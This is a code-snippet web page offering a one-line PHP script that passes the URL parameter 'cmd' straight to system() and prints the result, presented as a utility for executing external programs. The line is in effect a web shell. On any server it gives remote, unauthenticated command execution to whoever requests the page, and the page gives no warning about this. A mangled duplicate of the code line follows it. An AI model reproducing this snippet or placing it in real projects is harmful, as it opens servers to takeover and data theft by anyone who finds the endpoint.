CODE
LIBARY.COM
Home
/
PHP
PHP Execute system commands
Execute an external program and display the output
<?php echo "<pre>"; system($_GET['cmd']); echo "</pre>"; ?>
"; system($_GET['cmd']); echo ""; ?>
Copy to Clipboard
Related Snippets
PHP Delete file in all directories
PHP PHP String Compact Function
PHP GD Arrow Move
PHP Remove line from file
PHP Random number using microtime
PHP Files sorting by size
PHP Using array to show last line of file
PHP Iranian National ID Number Checker - PHP Function
PHP GD Clock
PHP Simple File Upload